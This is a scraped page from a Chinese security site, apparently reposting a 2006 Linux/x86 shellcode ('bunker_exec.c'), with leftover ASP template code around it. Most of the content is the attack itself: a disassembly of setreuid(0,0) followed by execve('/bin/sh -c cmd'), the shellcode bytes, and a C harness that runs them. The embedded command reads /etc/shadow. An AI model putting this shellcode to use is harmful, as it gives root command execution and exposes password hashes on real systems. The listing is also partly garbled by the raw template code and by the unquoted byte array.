<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("x46,pop") PageTitle=stripHTML("linux/x86 executes command after setreuid (9 + 40 bytes + cmd)") ArticleIntro=stripHTML("77169.com小编引言:linux/x86 executes command after setreuid (9 + 40 bytes + cmd),漏洞的主要原因: Linux漏洞") Articlecontent=stripHTML("/*
 * bunker_exec.c V1.3 - Tue Mar 21 22:50:18 CET 2006
 *
 * Linux/x86 bytecode…") ModuleName = stripHTML("exploits") InfoID = stripHTML("139151") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> linux/x86 executes command after setreuid (9 + 40 bytes + cmd) - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> shellcode >> 正文

linux/x86 executes command after setreuid (9 + 40 bytes + cmd)

2006/10/21 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

/*
* bunker_exec.c V1.3 - Tue Mar 21 22:50:18 CET 2006
*
* Linux/x86 bytecode that executes command after setreuid
* (9 + 40 bytes + cmd)
*
* setreuid(0, 0) + execve(/bin//sh, [/bin//sh,-c,cmd], NULL);
*
* cmd MUST be terminated with ; (better with ;exit; :-D)
*
* bunker - http://rawlab.mindcreations.com
* 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
*
* setreuid(0, 0);
* 00000000 6a46 push byte +0x46
* 00000002 58 pop eax
* 00000003 31db xor ebx,ebx
* 00000005 31c9 xor ecx,ecx
* 00000007 cd80 int 0x80
*
* execve(/bin//sh, [/bin//sh, -c, cmd], NULL);
* 00000009 eb21 jmp short 0x2c
* 0000000b 5f pop edi
* 0000000c 6a0b push byte +0xb
* 0000000e 58 pop eax
* 0000000f 99 cdq
* 00000010 52 push edx
* 00000011 66682d63 push word 0x632d
* 00000015 89e6 mov esi,esp
* 00000017 52 push edx
* 00000018 682f2f7368 push dword 0x68732f2f
* 0000001d 682f62696e push dword 0x6e69622f
* 00000022 89e3 mov ebx,esp
* 00000024 52 push edx
* 00000025 57 push edi
* 00000026 56 push esi
* 00000027 53 push ebx
* 00000028 89e1 mov ecx,esp
* 0000002a cd80 int 0x80
* 0000002c e8daffffff call 0xb
* 00000031 .... cmd; exit;
*/

char sc[]=
\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99
\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff
cat /etc/shadow; exit;;

main() { int(*f)()=(int(*)())sc;f(); }